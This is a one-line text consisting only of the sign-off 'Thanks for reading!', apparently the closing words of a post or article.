Thanks for reading!